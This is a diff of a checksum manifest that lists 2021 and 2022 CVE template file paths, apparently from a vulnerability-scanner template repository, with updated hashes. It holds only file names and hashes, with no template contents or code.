+http/cves/2021/CVE-2021-40972.yaml:2fe68e5934cea7eb8e7f44c3d0fe745470a1e0c9 +http/cves/2021/CVE-2021-40973.yaml:f8e519c6b544ea22d7c3d06dc5628c470e311dc2 http/cves/2021/CVE-2021-40978.yaml:a8c962c57edc1d0760271c053d5cae56c23ba5e9 -http/cves/2021/CVE-2021-41174.yaml:fa6d70e713a087560074a1967e8b7dce96fa38cd +http/cves/2021/CVE-2021-41174.yaml:e83dd147ef533cbf46398ab8bea7cbfaeb6fea6d http/cves/2021/CVE-2021-41192.yaml:079fec1025e916731f1ec243fa5873ba272fa007 http/cves/2021/CVE-2021-41266.yaml:8d081cc6e83f9e2b3397e60a81a16ec1a281b930 -http/cves/2021/CVE-2021-41277.yaml:5ef224cdb4e37d9ecb3237a8cca89056899ed757 -http/cves/2021/CVE-2021-41282.yaml:b050368c178e358c9aebc24e38129a370d3f64d5 +http/cves/2021/CVE-2021-41277.yaml:156d591678fc667638c340e306bb9380bd8b1e70 +http/cves/2021/CVE-2021-41282.yaml:6a3a4bc97283c0458c5e6159243a100e7123b3d7 http/cves/2021/CVE-2021-41291.yaml:984169427a50e27703f9eb32406ce40e1a36a4d5 http/cves/2021/CVE-2021-41293.yaml:126b34d1fa897ebca33a0331d478a68544c96235 -http/cves/2021/CVE-2021-41349.yaml:861b0593eb402420d60bd5676552a2343cadd097 -http/cves/2021/CVE-2021-41381.yaml:0a52047e8dde8f010728956b9e9d71088ddb87e8 -http/cves/2021/CVE-2021-41432.yaml:8ccccfa69a596c41f1df5be177a85f0b73ce8098 -http/cves/2021/CVE-2021-41460.yaml:ae7e6179c5d6ca32450f81c03fcaf39d34b8221d +http/cves/2021/CVE-2021-41349.yaml:1ba875a8b72e9587e7b725360c9e44a39bfd470c +http/cves/2021/CVE-2021-41381.yaml:c66efc83ef068a0ad406e506e6e82646d90f12c7 +http/cves/2021/CVE-2021-41432.yaml:42b5ebe80c69593f470d154b0327515b07d9d19c +http/cves/2021/CVE-2021-41460.yaml:91c1b4c21142677a5b6c7513cddaaa28b7ae9395 http/cves/2021/CVE-2021-41467.yaml:51e9bf3d8ad65e48d1dba90b473d125995f54de3 http/cves/2021/CVE-2021-41569.yaml:2c2ba97cff9b68cc6c448a1fb49c4e190460d10d -http/cves/2021/CVE-2021-41648.yaml:60e9dcc0e99f1df5353d44d464fb0b7cd0593caf +http/cves/2021/CVE-2021-41648.yaml:0830c156f6bc78d231c676ba030940a6a749b63c http/cves/2021/CVE-2021-41649.yaml:acc19e8708a6a4f3a502515195f6be004882f0e9 -http/cves/2021/CVE-2021-41653.yaml:3578aadef6ceea1b69fa0a6bf5a05a51afe45504 +http/cves/2021/CVE-2021-41653.yaml:f71dff1f3e8ca1c6d8abb9eb8cea9e6b87fffda6 http/cves/2021/CVE-2021-41691.yaml:d5c6275154110bdc9d78c09dadce004287917630 -http/cves/2021/CVE-2021-41749.yaml:90d4f9e6fe6c5fbef7f9ee2153fb841b4451c540 -http/cves/2021/CVE-2021-41773.yaml:90279d433d0c1af880ab2755946704d9729786bc +http/cves/2021/CVE-2021-41749.yaml:9f6b2ca98ec0eaa27f3672991d4317a7417b0100 +http/cves/2021/CVE-2021-41773.yaml:047b7d981eaeecae4ee3bfc65f26c3490be66d66 http/cves/2021/CVE-2021-41826.yaml:a8141bbbbc83b841143f8ac04fbbf369f77d54c6 http/cves/2021/CVE-2021-41878.yaml:8e2605b78d43422b23f6e5e263977290e45e1ea9 -http/cves/2021/CVE-2021-4191.yaml:f3213003b286620011e5b8952a3c7539327ab361 +http/cves/2021/CVE-2021-4191.yaml:1701a624f37677a6a1a9110c0919eaff1c320470 http/cves/2021/CVE-2021-41951.yaml:4bc3fdf1d171b6203536f93edcb69ad6d6497afc -http/cves/2021/CVE-2021-42013.yaml:fa81be16aa732c0728938fe290380a3ade44bfea -http/cves/2021/CVE-2021-42063.yaml:e6959f1dd464f4b98421592102d37f9eb9e1c736 +http/cves/2021/CVE-2021-42013.yaml:857542c251ce1df640072d77f870a648142228e9 +http/cves/2021/CVE-2021-42063.yaml:d34b09a91e9704893bdbd59a3bcc6da304e950d3 http/cves/2021/CVE-2021-42071.yaml:748f0615ef4142655d78ba5d86dd052c447ad312 -http/cves/2021/CVE-2021-42192.yaml:b812ebb74367408339a3d62bab21f8e1d2ae996a -http/cves/2021/CVE-2021-42237.yaml:cbac075bfbf5969fdf545d8ff4967c0214af1e51 +http/cves/2021/CVE-2021-42192.yaml:0d406d353b93321f9f43c8617cdd40910aee18a5 +http/cves/2021/CVE-2021-42237.yaml:620ada80bb541470a6d1d4c3fbd37a8e49e40cfe http/cves/2021/CVE-2021-42258.yaml:ad213c4af31afd36d0ff95b7e52260947aa2013d -http/cves/2021/CVE-2021-42551.yaml:423c75207a7156988c7470f235754d787fc81dd5 +http/cves/2021/CVE-2021-42551.yaml:9d19e6a83008f6db2b3156a91771dbc5c7a34eba http/cves/2021/CVE-2021-42565.yaml:349855ab852f856d965c2509f381cd6a280db83c http/cves/2021/CVE-2021-42566.yaml:6b4fea8d01a39aa24b8cb907502508b290479015 -http/cves/2021/CVE-2021-42567.yaml:25d6d3129b9f7ef453f4d31fcbbf4693c3e0a3bb -http/cves/2021/CVE-2021-42627.yaml:8bd1ef37323ca6a621b8125ea74629cf347850a2 -http/cves/2021/CVE-2021-42663.yaml:f3023c6a997a0d8027972baaaf23a96c5c8e884b +http/cves/2021/CVE-2021-42567.yaml:5f048dc5228bc530cadaf65cbc515c6a994bec02 +http/cves/2021/CVE-2021-42627.yaml:0c7089e1b4e500640d5a8dee4135777d173a6de1 +http/cves/2021/CVE-2021-42663.yaml:d8a831221ce19e89a9d16c0a027324c7e1d31228 http/cves/2021/CVE-2021-42667.yaml:c19169cb40060f91bb99ef5323b157fa0fbf6297 -http/cves/2021/CVE-2021-42887.yaml:513914035f14721f9a08c8ea5568398dcdf067ae -http/cves/2021/CVE-2021-43062.yaml:c71fbab832d06d5b33828ae676e47b8747c15bff -http/cves/2021/CVE-2021-43287.yaml:16248fc2271234a81fa08e34dc91e1eea2399bf6 +http/cves/2021/CVE-2021-42887.yaml:86422a34b8fb5635253b1269cad9aaaa7798d5ce +http/cves/2021/CVE-2021-43062.yaml:42e80e2833602392d9abcf0fdaab4a48668435e0 +http/cves/2021/CVE-2021-43287.yaml:5c61036d8f4fa95e44a1ef1ec2d4b32ef9d6cca0 http/cves/2021/CVE-2021-43421.yaml:75cab9aa0d3a6b660677a75116558d3b7c555ff1 http/cves/2021/CVE-2021-43495.yaml:7976f205a306ddb65f565049e3f4451bd9a5ce92 http/cves/2021/CVE-2021-43496.yaml:550ea33b0e0144d91382b8351c5ff8331b6e3bdf http/cves/2021/CVE-2021-43510.yaml:e90f6fcbc02221af5c21502f37214e7dbb03da06 -http/cves/2021/CVE-2021-43574.yaml:fa3aed7dc20e9eb8a8e6b4c67c713fdc06db754e -http/cves/2021/CVE-2021-43725.yaml:59285460dc20d495fc8de3f504303e4092f9abeb -http/cves/2021/CVE-2021-43734.yaml:dea1b7bf4546e4c474fd3a61042b80a6ab67755e +http/cves/2021/CVE-2021-43574.yaml:c7d88cc7cb4452e8102a11fdf3f2c2dc7f811c14 +http/cves/2021/CVE-2021-43725.yaml:0b058af2678906d19524e46a7c001e4d0c9cf3b3 +http/cves/2021/CVE-2021-43734.yaml:3ae893857308561ed8432d1765d0c7188381456b http/cves/2021/CVE-2021-43778.yaml:2f3bb0a0f9ad88cc38b6dfa0abda010822203ea9 -http/cves/2021/CVE-2021-43798.yaml:7f0c4ac0ca895a44b62aac3b17d5af98831a7b35 +http/cves/2021/CVE-2021-43798.yaml:2cba60db37dbdeaac39530054943c44e7a0fa3c1 http/cves/2021/CVE-2021-43810.yaml:e091cab75505c3576561a0e55d7f45be46ed0e9f http/cves/2021/CVE-2021-44077.yaml:cb77a5c0a315f9be21761f87ed2d2c7d51fd1d5d -http/cves/2021/CVE-2021-44138.yaml:bcd6d09acb5531955814c792a08a48d3f300b6df -http/cves/2021/CVE-2021-44139.yaml:e2abf3fb9150c49b3e62712c0f5ccaaae8267c02 -http/cves/2021/CVE-2021-44152.yaml:97d21f7c6479a629ce57d98f7aed969c6a41337b +http/cves/2021/CVE-2021-44138.yaml:d3eba1f5b10514f1cf0f214a3f90e9a179e72fb4 +http/cves/2021/CVE-2021-44139.yaml:1216fbac2f54785db4dc01e9e64de046ad4d7564 +http/cves/2021/CVE-2021-44152.yaml:583b6e4a9e6e66be548bebfd3acf7cfcff918052 http/cves/2021/CVE-2021-44228.yaml:8874a4c3724b6c1c3ea43e62fbb9ecdca5d3772f http/cves/2021/CVE-2021-44427.yaml:2c4dacfc13a61ca0565e786199ea8ddff21bf839 -http/cves/2021/CVE-2021-44451.yaml:84311023e257489100f240c95bbe75a967e0dd3d -http/cves/2021/CVE-2021-44515.yaml:da4641ba423dd57a8ee2a74df23f13ff1c78d764 -http/cves/2021/CVE-2021-44528.yaml:a90fe083b4bfef66425ecb9f129dccb029da470f -http/cves/2021/CVE-2021-44529.yaml:9bc01beb998db429f7f503dcb18c4e48852c108f +http/cves/2021/CVE-2021-44451.yaml:9fd4fc8b354b2d70ac8d12b3c2fabf0dac97353d +http/cves/2021/CVE-2021-44515.yaml:05859e5f2d169b5f4d9a0faf67b3890ad53044de +http/cves/2021/CVE-2021-44528.yaml:415702074e6837f16d577237fb7b378149d8ba33 +http/cves/2021/CVE-2021-44529.yaml:23741df7348b1b95ccd3548115b8b1e63def45a7 http/cves/2021/CVE-2021-44848.yaml:bd86dec475898fda93191256ca601bc9f17d2dd6 http/cves/2021/CVE-2021-44910.yaml:9fb4989116e0167c603c3ea4a0bcac68841d7b04 -http/cves/2021/CVE-2021-45043.yaml:1e51c0d78e6fc4258b3507a9c28853b3c9a60aa8 +http/cves/2021/CVE-2021-45043.yaml:ff41e0711c6e413b2c0ced1ff9c5cf818fb8b811 http/cves/2021/CVE-2021-45046.yaml:afbe6d9a4df0b57c8853d9fce778442240163d57 http/cves/2021/CVE-2021-45092.yaml:961fde42602a37607b86120d8a299db382e42444 http/cves/2021/CVE-2021-45232.yaml:c09fc24183a14f9ad3bc2e917a0c58cd2bedb705 -http/cves/2021/CVE-2021-45380.yaml:5d7282f11e5e5a66f1a5969b7d82928d74009d37 +http/cves/2021/CVE-2021-45380.yaml:a347426c3554fa83e6cfc5472d03085fa781c93b http/cves/2021/CVE-2021-45382.yaml:cb0aa02a98b1cdfda90a720aed418fb486944046 -http/cves/2021/CVE-2021-45422.yaml:abe8cd4316f90eb4455c2de2069f1237fdb60b2d +http/cves/2021/CVE-2021-45422.yaml:22cd235389b717aa077aa28d079a9667685c7cc8 http/cves/2021/CVE-2021-45428.yaml:14d98248ac661705a256a679f0eb6e1e48233c2b http/cves/2021/CVE-2021-45967.yaml:1c060977d1fab68ce71716addc499b6eaea77589 http/cves/2021/CVE-2021-45968.yaml:921c33e7aeeb0b0ce6f57a9e457d202de0285cd8 @@ -2390,17 +2390,17 @@ http/cves/2021/CVE-2021-46068.yaml:1b53ecee2963550e1b687c2c93a33974ce779452 http/cves/2021/CVE-2021-46069.yaml:7783bc454b975263aac0f62dbfdb460f0c3c42c0 http/cves/2021/CVE-2021-46071.yaml:a76d33573617d153689d9213a457a03115c736e4 http/cves/2021/CVE-2021-46072.yaml:ea0e7e2699eff6c50de4bd5ca80d862ba3ceb89e -http/cves/2021/CVE-2021-46073.yaml:370eac8c9753d59b40b3ace444f6ac9875a63e30 -http/cves/2021/CVE-2021-46107.yaml:641c648031b4996c9675c33b60f84a027ef396ad +http/cves/2021/CVE-2021-46073.yaml:98780e5d0d49b0f4a07ce3bdb4f9a4232cf6ecc2 +http/cves/2021/CVE-2021-46107.yaml:2f176fda17f3044608e094e51cb86a8fff02cdfc http/cves/2021/CVE-2021-46379.yaml:8d6452a442fe0d4a02cdb518cb4b8c8b1a74ef0f http/cves/2021/CVE-2021-46381.yaml:bbcbebb42a2e8f7f01be371dc8232f53ffead9c8 -http/cves/2021/CVE-2021-46387.yaml:fbaa07306156853f0ad9c456e5fcdbf513325525 -http/cves/2021/CVE-2021-46417.yaml:81fc12ccebc22b72ca3d728fa7d161e9505ec4b6 -http/cves/2021/CVE-2021-46418.yaml:e509a70568c23a42f981b047a31ea92feb06ab25 -http/cves/2021/CVE-2021-46419.yaml:ae2aac1ea6d97d7931ce84530d527552810b1da4 +http/cves/2021/CVE-2021-46387.yaml:1ecde7835e7c023fb1c97686f5b0b05cbecd2cb0 +http/cves/2021/CVE-2021-46417.yaml:2e54e15e77074df30f445c3d0a112c690d0e3f43 +http/cves/2021/CVE-2021-46418.yaml:27bcc838c039b4dd3971ebe05afc985c2ad0d1e1 +http/cves/2021/CVE-2021-46419.yaml:30195ec9cf7ece58bcfc404de67a27e730c69390 http/cves/2021/CVE-2021-46422.yaml:0579fb33431d31ec41b9974a2d5b1dd65e6c2168 -http/cves/2021/CVE-2021-46424.yaml:9617db0426268d98d18332d222675f954fd2dc91 -http/cves/2021/CVE-2021-46704.yaml:1151ef46dae07f75345210c43a707142147a474e +http/cves/2021/CVE-2021-46424.yaml:6a0d63fbdb5cff00bfc23ff989dd3feacff8157d +http/cves/2021/CVE-2021-46704.yaml:a532d17086072eace578c999866f13846a5ef525 http/cves/2022/CVE-2022-0087.yaml:ab30fa1e96d3eefebcff47dc05be32b1ef1d6467 http/cves/2022/CVE-2022-0140.yaml:1df6fe2127b2d8ff6f801b6c7a87ce18c0dd12a7 http/cves/2022/CVE-2022-0147.yaml:d50f59648ef62408d211f30339418e1f73546638 @@ -2408,52 +2408,52 @@ http/cves/2022/CVE-2022-0148.yaml:6a2d16cdaa86368c72f3cebd570cf17b9b62884b http/cves/2022/CVE-2022-0149.yaml:af0215192be07e3b138588253c487d2d703af86f http/cves/2022/CVE-2022-0150.yaml:f765c4284c3293fe8b624302e607fb8ff2bd6c29 http/cves/2022/CVE-2022-0165.yaml:e21ba3dfe35f2b3998366d54a92f873f4a043135 -http/cves/2022/CVE-2022-0169.yaml:73319c090a403deb80d746331231a0f83221abed +http/cves/2022/CVE-2022-0169.yaml:28a852854f42aaf846dcb80e65dbed9ec926ac38 http/cves/2022/CVE-2022-0189.yaml:6f59568727b063610e2c24e6433ea81631ce8656 -http/cves/2022/CVE-2022-0201.yaml:04312080723927883df87137d0d5eb769d3c4045 +http/cves/2022/CVE-2022-0201.yaml:ffcbfb92ee14541e86f8a996e355c9afacc36cd4 http/cves/2022/CVE-2022-0206.yaml:e41f2247cca58a20bf9db2562b63d82a1a88fe76 http/cves/2022/CVE-2022-0208.yaml:f94f8e7a05eda6a691d54be067aec88feac62a92 http/cves/2022/CVE-2022-0212.yaml:cd4f5f85b3a6879d1848a351c1eb1a23468aaa72 http/cves/2022/CVE-2022-0218.yaml:cfb01741cc062e2e759d4c0d6990be3702aa7ea1 -http/cves/2022/CVE-2022-0220.yaml:b3d359e13bca582b964565a09419347cfde13608 -http/cves/2022/CVE-2022-0228.yaml:cf59f3e5671faadd5f722f3992062483fa52789c +http/cves/2022/CVE-2022-0220.yaml:5472c5fdccf0d3dacdd9bb42357f02e1fc8f8b75 +http/cves/2022/CVE-2022-0228.yaml:1589f23a7896099b20e8097c18575130aa267880 http/cves/2022/CVE-2022-0234.yaml:28adef5f0da5150793b2b58515a733b094122c01 -http/cves/2022/CVE-2022-0271.yaml:12559da2dbf1bd54ee65b330bc05320a598317c7 -http/cves/2022/CVE-2022-0281.yaml:d39333e81404820d979f757cff2ff5e92e014ead +http/cves/2022/CVE-2022-0271.yaml:4cddda63b7bb27cc25fc8f1d90b5ee6bd69bad0e +http/cves/2022/CVE-2022-0281.yaml:fb3d9649a77f8106ed24907a5b183ae4e178226f http/cves/2022/CVE-2022-0288.yaml:bded7808021892901eeb0ca82eaa4d323e5d8e9d -http/cves/2022/CVE-2022-0342.yaml:7ad6be74eecbdae6633555867578a66ea7676bd7 +http/cves/2022/CVE-2022-0342.yaml:c2521dc0957f5d5edcf49c1250d7d7a536b91b03 http/cves/2022/CVE-2022-0346.yaml:222700feb32d0e6514e9bb0380c883ce6f8ad6d6 http/cves/2022/CVE-2022-0349.yaml:800ce9d18fc4a8c58d309ca4e50610a2c1143114 -http/cves/2022/CVE-2022-0378.yaml:b0a63a5b4d4bbea5e86edccbdbca5d5380dcc493 -http/cves/2022/CVE-2022-0381.yaml:bab0c1f47359cc9c8960f33d7266351eb1565086 +http/cves/2022/CVE-2022-0378.yaml:32d0204201df6e7291a27a492a2321a6bb263e9b +http/cves/2022/CVE-2022-0381.yaml:a48735c24123fcf7a50ce5d397adf6ec7d19a669 http/cves/2022/CVE-2022-0412.yaml:c50a4e2c407b2a259e239ad64d58ae537570b780 -http/cves/2022/CVE-2022-0415.yaml:58fb646d9818d5cd5d799b6259cd25ebad7e201c +http/cves/2022/CVE-2022-0415.yaml:29bd4575ce17bab87ac6bf902a783eede0c1a6b7 http/cves/2022/CVE-2022-0422.yaml:6269517eaa64f536ddf2367ac408b436a6fed3a4 -http/cves/2022/CVE-2022-0424.yaml:a15f808f9bf89cda5d300f87d1968bb94076b0f4 +http/cves/2022/CVE-2022-0424.yaml:eca7e2f5fe9c103f9f2a75a1444539881f50f5b4 http/cves/2022/CVE-2022-0432.yaml:1b318f354339465c6a6dd7e42c5d12a45c3e160c http/cves/2022/CVE-2022-0434.yaml:998f7112926cb758d14a8357ac45c0eb08744640 http/cves/2022/CVE-2022-0437.yaml:6a57d2ad863ac623a9a0ce5108e7620bd56e11fa http/cves/2022/CVE-2022-0441.yaml:c0d4b5a324d0e9415535f698f4ee3278d8225377 http/cves/2022/CVE-2022-0482.yaml:06f529926dbce7d867c0aa57cea96bc261ae7feb -http/cves/2022/CVE-2022-0533.yaml:8ccd3d1054d1ae94cf7b67935f0eafc3535d18f3 +http/cves/2022/CVE-2022-0533.yaml:8f58f62f254170da1cda57bcf4b93d73a40e04b5 http/cves/2022/CVE-2022-0535.yaml:12c5101dc64287aa7ed4e6e95b4c82b2e507ace5 -http/cves/2022/CVE-2022-0540.yaml:a3a2456f497dd9162f512c1cefdc2ae77cb2bfb5 -http/cves/2022/CVE-2022-0591.yaml:fd13351808c85fd8f0b666270fe6d7afaadab094 +http/cves/2022/CVE-2022-0540.yaml:f9c25c295a812b1508651781cc765af727ea4048 +http/cves/2022/CVE-2022-0591.yaml:43f22cfa69f76623521fc55fffe9497c56bd0f18 http/cves/2022/CVE-2022-0594.yaml:0557f5bdd81dd3c1ed4d6e070eb23303b24f16d9 http/cves/2022/CVE-2022-0595.yaml:c93f58fb37203da06c1bb160f7fe787f08440db7 -http/cves/2022/CVE-2022-0597.yaml:385328795fc8323bc1e1f605236d5e0b18dc3d8f +http/cves/2022/CVE-2022-0597.yaml:0442969cf523c21a269e7907e4f8370a26927191 http/cves/2022/CVE-2022-0599.yaml:396f247c7262420516ea089cfc09a748dbc1803b -http/cves/2022/CVE-2022-0651.yaml:b495b93f495fe5bd1e706ce24e66beab7233e2eb +http/cves/2022/CVE-2022-0651.yaml:687375c7afe76b90f5c36dbcf24264e98d2fc1d4 http/cves/2022/CVE-2022-0653.yaml:52274e93b6ea8926e170293dce796d792a5e0a48 http/cves/2022/CVE-2022-0656.yaml:2975cb24c367f2e0bf11b3a966529591c8ed2edf http/cves/2022/CVE-2022-0658.yaml:2b1f5971384f81ffce9e3a8427555bbd01b3b3a5 -http/cves/2022/CVE-2022-0660.yaml:847e3682f3a3903749f0d44adf0697a838a405e4 -http/cves/2022/CVE-2022-0666.yaml:0d419de095f12254b58c3b9b13c86ab3e6969390 -http/cves/2022/CVE-2022-0678.yaml:8b33e92b350e562c7bece96f5e9328e7319792ae +http/cves/2022/CVE-2022-0660.yaml:f03969941ecdac9bf6e2f6b5774fb3c915510b24 +http/cves/2022/CVE-2022-0666.yaml:85033981dc9ab7e90b90097d65647648bd4aed84 +http/cves/2022/CVE-2022-0678.yaml:7c883cd82059c86f77199b604bb8f3329d6a1b80 http/cves/2022/CVE-2022-0679.yaml:bb862b57bb18b1832313bed2c8f3095286ab5f0b http/cves/2022/CVE-2022-0692.yaml:16bb78665f4c62b041bf0641d2afe49587c40472 http/cves/2022/CVE-2022-0693.yaml:2aecdcd6ffe92ccba0d03350a27308e1da93c8cd -http/cves/2022/CVE-2022-0735.yaml:3f2a7802741090808fce2ba6f6a10607c2b5015b +http/cves/2022/CVE-2022-0735.yaml:2f83ee7e02854bba2e068e815e89f5b7f80ca5ef http/cves/2022/CVE-2022-0747.yaml:890b432df0ad9e435385331f6c2eb688bb5a005e http/cves/2022/CVE-2022-0760.yaml:6cb4a03a430f9731eb6888abbb95be407f48dd01 http/cves/2022/CVE-2022-0769.yaml:fa9f8927a0ec479b990f84398ae6d6682c8765ab @@ -2461,11 +2461,11 @@ http/cves/2022/CVE-2022-0773.yaml:60911205f06d37439f55025d19e56f3cdef9f67c http/cves/2022/CVE-2022-0776.yaml:7bd96bf74cec15da9b768dfd9e67a731a594c545 http/cves/2022/CVE-2022-0781.yaml:c75712f70574a0f093bc6832e5fc779121ac49cf http/cves/2022/CVE-2022-0784.yaml:339ca31d50774616a5f566cb81ab5bd55e46a59b -http/cves/2022/CVE-2022-0785.yaml:47eddef2296126f08953940173a7cd6c3611a807 +http/cves/2022/CVE-2022-0785.yaml:7a8de5cabe800614208e75c20a66a870fe3e8a05 http/cves/2022/CVE-2022-0786.yaml:d3061ccf83938bb17391061d42e6ad26e1054133 http/cves/2022/CVE-2022-0787.yaml:770ac3ab82af6c50987b53eea627cfde6ee48366 http/cves/2022/CVE-2022-0788.yaml:5d60f92d349f7fecefec325a40f08d6970a98a99 -http/cves/2022/CVE-2022-0814.yaml:e473e5d2a9b612a2412867eed364d71782c262a6 +http/cves/2022/CVE-2022-0814.yaml:179da8e756871d8ec31362db9bd151117cc76559 http/cves/2022/CVE-2022-0817.yaml:3d97d0fc13055df8d7452acbf7103cbed7eb24cc http/cves/2022/CVE-2022-0824.yaml:0c81c3a3ec7279bb619a1e0ddc46dd2fe2463ad7 http/cves/2022/CVE-2022-0826.yaml:89bc081100825cb559a3d8e4864166d9be637ffb @@ -2474,161 +2474,161 @@ http/cves/2022/CVE-2022-0846.yaml:19baadca475a5807aaafef134a6e7399ab75ec51 http/cves/2022/CVE-2022-0864.yaml:f2dfdb584ab501f690ba9ef1aee6ecc88f0ae7f7 http/cves/2022/CVE-2022-0867.yaml:6e863875d948eb2710e1bd9f80b30a8a4a84e1ce http/cves/2022/CVE-2022-0869.yaml:ffdda923697da8dad00a7821ca970cb742cc05db -http/cves/2022/CVE-2022-0870.yaml:c0a1da968d7de2ac01c434c3205bd76a4e818c7d -http/cves/2022/CVE-2022-0885.yaml:841e640a6d3e053d8347a3f6083e082f8add157b +http/cves/2022/CVE-2022-0870.yaml:d46febdb762c0c2f893068ed75dcd6b4ddafb1a1 +http/cves/2022/CVE-2022-0885.yaml:f31972422180838be9f96c1ef5b9c432858b0128 http/cves/2022/CVE-2022-0899.yaml:c733b3141b9bef1f5c43da49ef612ab4659ecb5b -http/cves/2022/CVE-2022-0928.yaml:cdf847204591956605abac79d420f1d5b75cd373 +http/cves/2022/CVE-2022-0928.yaml:dd6c28732a8250704409cf9d815b4bfa95ed6c85 http/cves/2022/CVE-2022-0948.yaml:d81bdba80c595c26ed421d5ac4697749a26423d5 http/cves/2022/CVE-2022-0949.yaml:cecc462fb3fa010b12cac54c2901675f7105f609 http/cves/2022/CVE-2022-0952.yaml:7e2d47b7c6fed59342471c942cb0707a354d59ed -http/cves/2022/CVE-2022-0954.yaml:5f4736f21c8c640129ed812648c5bacbffd65ad6 -http/cves/2022/CVE-2022-0963.yaml:343a897b687d3a0251dd6ba042835f262613464b -http/cves/2022/CVE-2022-0968.yaml:7f41a4468f29df94ec356ce6d3696f6d3a53ffe0 +http/cves/2022/CVE-2022-0954.yaml:5cd411b3c03c685247fb13509ae3df387bdd57b5 +http/cves/2022/CVE-2022-0963.yaml:a462bb84452258da02ba29d7ceaf51dfaaf52854 +http/cves/2022/CVE-2022-0968.yaml:7ea4bb7844c7b1229f1510986632b5077d5f93ee http/cves/2022/CVE-2022-1007.yaml:7fa894f5f894592900a2009b1c61500f729c9f9e http/cves/2022/CVE-2022-1013.yaml:e28846ed928a45764a457f62019d3981ba035a9f http/cves/2022/CVE-2022-1020.yaml:59af3f4fbbadc5897088c95b708c639991dc15e6 -http/cves/2022/CVE-2022-1040.yaml:ef0141940d3336b5a77a0819a4b6650d624eeb75 +http/cves/2022/CVE-2022-1040.yaml:a3c676dbf1bba39abe3f4c916c6aae6e175d3a83 http/cves/2022/CVE-2022-1054.yaml:c935bda6318e2aa45761fcbbb8a16799993f77b0 http/cves/2022/CVE-2022-1057.yaml:d10ec405daf09748e2cee57619a8ce228f851d08 -http/cves/2022/CVE-2022-1058.yaml:fa6472726c416a474d04356f86e80eded60bef22 +http/cves/2022/CVE-2022-1058.yaml:22023540f18377a7cb531c1bc1d86956919cc466 http/cves/2022/CVE-2022-1119.yaml:afa8d79a86918b793e22a3a43b81a6cc9b3fc21b -http/cves/2022/CVE-2022-1162.yaml:aadb2ccbbe313d5db3cadfcf539a61bcdbbfecd2 +http/cves/2022/CVE-2022-1162.yaml:9751288b58e493f443ac92be6a42d391a091567a http/cves/2022/CVE-2022-1168.yaml:93e0ac42cd3ee8391d615a78f9eac80ae749aa8f -http/cves/2022/CVE-2022-1170.yaml:23a3f124f13e2ed6c1b8528322b430457f7f62d5 +http/cves/2022/CVE-2022-1170.yaml:54fbc4f357ad668abd39e13f8be47e98771e7086 http/cves/2022/CVE-2022-1221.yaml:d4c46be1641ebeef015e219a3d6bfd4ab55ce8f0 http/cves/2022/CVE-2022-1329.yaml:91ffe6a2f0b02dff11a43ae18576f2744a9d0fb1 -http/cves/2022/CVE-2022-1386.yaml:aa0a7b167a70177b8c278aae2abbda92dc3a65ff -http/cves/2022/CVE-2022-1388.yaml:e5f337ca85d659ab5b48e69dfa2e9a1c544b881b +http/cves/2022/CVE-2022-1386.yaml:6d898f62900aa7a3043f697b5f68318392f7afbb +http/cves/2022/CVE-2022-1388.yaml:8272b84a663a5a7e5e19d0748168dafdea855edd http/cves/2022/CVE-2022-1390.yaml:cdda5e7620a740024ec05c775b94861e6885853a http/cves/2022/CVE-2022-1391.yaml:d8fe08b47cb867425b80fa614e64f8b211ff609e http/cves/2022/CVE-2022-1392.yaml:4a5322eb6a6ced5d4701bdba6ef76000f25ae688 http/cves/2022/CVE-2022-1398.yaml:8168fc6638082f59e200f1101d369a35f0d123ed -http/cves/2022/CVE-2022-1439.yaml:8116c3eb8cdc58d99590b47363373880a2b6fc4e +http/cves/2022/CVE-2022-1439.yaml:50186e7d0fb3325f3fdd2c64549da3aaae32f623 http/cves/2022/CVE-2022-1442.yaml:30e8e97a7bd381c969779fb4da9a6663d53cfe6a http/cves/2022/CVE-2022-1574.yaml:142d329c712a44d57c8700e687f90ea359c0793f -http/cves/2022/CVE-2022-1580.yaml:e86f46e73eeefadee0fd5f5a1581fb6528a11981 -http/cves/2022/CVE-2022-1595.yaml:e62d387c391349d9a30991379aff1b17d5af912d +http/cves/2022/CVE-2022-1580.yaml:6fb12906eb1baf65d0b20a76cda86adc9cafd9f3 +http/cves/2022/CVE-2022-1595.yaml:74e2a888ff9e412221fd9debb751fb9d06d9f26c http/cves/2022/CVE-2022-1597.yaml:acd2bc2b43d82b445540d1f4c22079064a682b0f http/cves/2022/CVE-2022-1598.yaml:8128f57a4c1e94173bbcc9a79e43b3868d7a143e -http/cves/2022/CVE-2022-1609.yaml:3997b6a9aec82ff2e552d1b8f53e34f0d61de38d -http/cves/2022/CVE-2022-1713.yaml:bca5d5a72566c083a6871e8473f90250a7abf66d -http/cves/2022/CVE-2022-1724.yaml:51995547bb5168cd0645a5adf37a850a5a1e6b87 -http/cves/2022/CVE-2022-1756.yaml:e66d32418b3801f7b9d1faa6f453b9085b44153e +http/cves/2022/CVE-2022-1609.yaml:086e330bb1581a9fcb6ea4b38ef6ac3e9aad4fed +http/cves/2022/CVE-2022-1713.yaml:4b30de1605b98b39e69de02f21c193ad8a78449a +http/cves/2022/CVE-2022-1724.yaml:9450536602318410ca9269a24199754d1394ef87 +http/cves/2022/CVE-2022-1756.yaml:88b9c750ab117f84520be017474df47ddb37747f http/cves/2022/CVE-2022-1768.yaml:b858d3fecec81416d5abb5cfea90245ddac0aed5 -http/cves/2022/CVE-2022-1815.yaml:d32b30a32ded3c4253324504d8175705eaa15a17 -http/cves/2022/CVE-2022-1883.yaml:9ea27969a99bb6fcb353913f3c079f33f01a3e3c +http/cves/2022/CVE-2022-1815.yaml:a2e0fa6e8823718850f4282cb4ae81805751fff3 +http/cves/2022/CVE-2022-1883.yaml:6c235e20d502c0c8d7547e4e4ee119df87fbd2ef http/cves/2022/CVE-2022-1903.yaml:2a124e2da9fa4d26fbba2f834a5ffae2d3ae02a4 http/cves/2022/CVE-2022-1904.yaml:8364554cac977f888ab267875d02bbf1f2cb924b -http/cves/2022/CVE-2022-1906.yaml:32a30dcf31d119545c4e7d34db4609089bf3fab5 -http/cves/2022/CVE-2022-1910.yaml:285281f4e315d751f66c43077868a0c660fa544c +http/cves/2022/CVE-2022-1906.yaml:8a8a81448b0507271db375bf2a09e8055ba0dd50 +http/cves/2022/CVE-2022-1910.yaml:c42f28f4a6df38955d4e994c608b5abc00f2aba1 http/cves/2022/CVE-2022-1916.yaml:c49dfcef4c446dc595f69fc553a3ac2a70461b5c http/cves/2022/CVE-2022-1933.yaml:698dc72c8292ca8e6b7d5b7c52c9a8ea39407718 http/cves/2022/CVE-2022-1937.yaml:c00f650791aba407ac24c268cd5b15fd0226a957 